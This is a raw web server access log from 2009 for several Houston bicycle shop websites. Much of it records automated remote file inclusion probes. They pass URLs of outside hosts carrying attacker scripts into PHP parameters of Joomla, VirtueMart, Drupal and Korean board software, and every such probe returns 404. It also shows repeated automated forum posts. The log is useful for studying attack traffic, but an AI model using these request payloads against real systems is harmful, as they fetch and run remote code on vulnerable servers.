91.121.150.170 - - [12/Jun/2009:03:52:14 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
72.30.79.51 - - [12/Jun/2009:04:07:04 -0700] "GET /translations/Turkish.txt HTTP/1.0" 200 32818 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
216.119.103.12 - - [12/Jun/2009:04:13:16 -0700] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.waxzone.net//components/com_virtuemart/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
216.119.103.12 - - [12/Jun/2009:04:13:16 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.waxzone.net//components/com_virtuemart/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
216.119.103.12 - - [12/Jun/2009:04:13:16 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.waxzone.net//components/com_virtuemart/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
85.214.37.11 - - [12/Jun/2009:04:27:28 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.214.37.11 - - [12/Jun/2009:04:27:28 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.214.37.11 - - [12/Jun/2009:04:27:28 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.214.37.11 - - [12/Jun/2009:04:27:41 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.214.37.11 - - [12/Jun/2009:04:28:14 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.37.11 - - [12/Jun/2009:04:28:14 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.37.11 - - [12/Jun/2009:04:28:14 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.37.11 - - [12/Jun/2009:04:28:14 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [12/Jun/2009:04:32:16 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [12/Jun/2009:04:32:16 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [12/Jun/2009:04:32:16 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [12/Jun/2009:04:32:32 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [12/Jun/2009:04:33:39 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [12/Jun/2009:04:33:39 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [12/Jun/2009:04:33:40 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [12/Jun/2009:04:33:40 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
207.218.240.18 - - [12/Jun/2009:04:37:17 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
207.218.240.18 - - [12/Jun/2009:04:37:17 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
207.218.240.18 - - [12/Jun/2009:04:37:17 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
207.218.240.18 - - [12/Jun/2009:04:38:35 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
207.218.240.18 - - [12/Jun/2009:04:38:35 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
207.218.240.18 - - [12/Jun/2009:04:38:35 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
85.214.37.11 - - [12/Jun/2009:04:41:32 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.37.11 - - [12/Jun/2009:04:42:09 -0700] "GET /translations/English-US.txt//tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.37.11 - - [12/Jun/2009:04:44:13 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
85.214.37.11 - - [12/Jun/2009:04:44:13 -0700] "GET /translations/Chinese-GB2312.txt//tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
85.214.37.11 - - [12/Jun/2009:04:44:13 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
208.80.195.36 - - [12/Jun/2009:04:45:19 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Media Center PC 4.0)" "houstonbikeshop.com"
85.214.37.11 - - [12/Jun/2009:04:46:03 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.214.37.11 - - [12/Jun/2009:04:46:03 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [12/Jun/2009:04:49:03 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [12/Jun/2009:04:50:22 -0700] "GET /translations/English-US.txt//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [12/Jun/2009:04:52:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
70.85.165.10 - - [12/Jun/2009:04:52:34 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
70.85.165.10 - - [12/Jun/2009:04:52:34 -0700] "GET /translations/Chinese-GB2312.txt//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
211.203.180.144 - - [12/Jun/2009:04:53:33 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.203.180.144 - - [12/Jun/2009:04:53:33 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.203.180.144 - - [12/Jun/2009:04:53:33 -0700] "GET /skin/zero_vote/error.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [12/Jun/2009:04:56:40 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [12/Jun/2009:04:56:41 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [12/Jun/2009:05:02:41 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
222.122.160.145 - - [12/Jun/2009:05:30:55 -0700] "GET /drupal/?_menu[callbacks][1][callback]=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
222.122.160.145 - - [12/Jun/2009:05:30:55 -0700] "GET /logs//drupal/?_menu[callbacks][1][callback]=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
222.122.160.145 - - [12/Jun/2009:05:41:03 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
222.122.160.145 - - [12/Jun/2009:05:41:03 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
201.232.54.48 - - [12/Jun/2009:05:42:16 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [12/Jun/2009:05:42:16 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [12/Jun/2009:05:42:16 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [12/Jun/2009:05:42:20 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [12/Jun/2009:05:45:57 -0700] "GET /translations/Chinese-GB2312.txt//tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
201.232.54.48 - - [12/Jun/2009:05:45:57 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
201.232.54.48 - - [12/Jun/2009:05:45:57 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
72.30.161.223 - - [12/Jun/2009:05:53:38 -0700] "GET /bullitinboard/viewtopic.php?p=12754 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
58.61.164.41 - - [12/Jun/2009:05:59:51 -0700] "GET /robots.txt HTTP/1.1" 404 275 "http://www.svbikes.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.svbikes.com"
119.63.194.90 - - [12/Jun/2009:06:10:43 -0700] "GET /bullitinboard/viewtopic.php?p=12754 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
65.55.106.186 - - [12/Jun/2009:06:11:49 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
61.106.21.32 - - [12/Jun/2009:06:13:18 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.106.21.32 - - [12/Jun/2009:06:13:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.106.21.32 - - [12/Jun/2009:06:13:20 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.106.21.32 - - [12/Jun/2009:06:13:24 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.106.21.32 - - [12/Jun/2009:06:13:24 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.106.21.32 - - [12/Jun/2009:06:13:25 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
91.121.150.170 - - [12/Jun/2009:06:24:00 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
81.19.66.38 - - [12/Jun/2009:06:25:48 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jun/2009:06:25:49 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jun/2009:06:25:50 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jun/2009:06:25:50 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jun/2009:06:25:50 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
218.246.20.221 - - [12/Jun/2009:06:32:52 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.246.20.221 - - [12/Jun/2009:06:32:52 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [12/Jun/2009:06:33:40 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
195.254.134.50 - - [12/Jun/2009:06:38:19 -0700] "GET /body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.254.134.50 - - [12/Jun/2009:06:38:28 -0700] "GET /logs/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.254.134.50 - - [12/Jun/2009:06:38:29 -0700] "GET /logs/access.log%20%20/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [12/Jun/2009:06:40:14 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
72.30.161.223 - - [12/Jun/2009:06:45:06 -0700] "GET /?D=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
91.121.150.170 - - [12/Jun/2009:07:03:06 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [12/Jun/2009:07:03:06 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [12/Jun/2009:07:12:52 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jun/2009:07:14:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jun/2009:07:18:51 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [12/Jun/2009:07:20:11 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
208.80.195.41 - - [12/Jun/2009:07:28:30 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; {5F726DD3-D1D0-4AA7-ADE9-CF6C0B945275})" "svbikes.com"
91.121.150.170 - - [12/Jun/2009:07:31:22 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
12.167.3.21 - - [12/Jun/2009:07:35:12 -0700] "GET /fit.html HTTP/1.1" 200 17443 "http://www.bing.com/search?q=correct+pedal+strokes&first=11&FORM=PORE" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.svbikes.com"
12.167.3.21 - - [12/Jun/2009:07:35:12 -0700] "GET /images/fit2.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.svbikes.com"
12.167.3.21 - - [12/Jun/2009:07:35:12 -0700] "GET /images/SVB_Logos_gif_version_1_.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.svbikes.com"
91.121.150.170 - - [12/Jun/2009:07:40:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jun/2009:07:46:17 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
222.122.160.145 - - [12/Jun/2009:07:53:57 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
222.122.160.145 - - [12/Jun/2009:07:53:57 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
200.31.42.3 - - [12/Jun/2009:07:56:29 -0700] "GET /bullitinboard/viewtopic.php?t=2208&highlight= HTTP/1.0" 200 517 "http://www.wisecarehealth.com/medical-alternative-www-odyssey-thornton-colorado.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 3.0)" "www.svbikes.com"
65.55.211.70 - - [12/Jun/2009:07:56:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.70 - - [12/Jun/2009:07:56:48 -0700] "GET /logs/ HTTP/1.1" 200 2368 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
211.203.180.144 - - [12/Jun/2009:08:00:47 -0700] "GET /includes/pop.php?base=http://kb27.co.kr/bbs///rfi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.203.180.144 - - [12/Jun/2009:08:00:47 -0700] "GET /translations//includes/pop.php?base=http://kb27.co.kr/bbs///rfi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.203.180.144 - - [12/Jun/2009:08:00:50 -0700] "GET /translations/Portuguese_BR.txt//includes/pop.php?base=http://kb27.co.kr/bbs///rfi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.80.195.36 - - [12/Jun/2009:08:34:38 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; SpamBlockerUtility 4.8.4; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)" "www.svbikes.com"
77.88.30.247 - - [12/Jun/2009:08:35:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "YandexSomething/1.0" "www.svbikes.com"
77.88.30.247 - - [12/Jun/2009:08:35:45 -0700] "GET / HTTP/1.1" 200 1764 "-" "YandexSomething/1.0" "www.svbikes.com"
222.122.160.145 - - [12/Jun/2009:08:37:28 -0700] "GET /classes/core/language.php?rootdir=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
62.149.26.131 - - [12/Jun/2009:08:43:35 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.149.26.131 - - [12/Jun/2009:08:43:38 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.149.26.131 - - [12/Jun/2009:08:43:38 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.124.127.164 - - [12/Jun/2009:08:44:06 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.124.127.164 - - [12/Jun/2009:08:44:07 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.124.127.164 - - [12/Jun/2009:08:44:07 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.124.127.164 - - [12/Jun/2009:08:48:27 -0700] "GET /logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
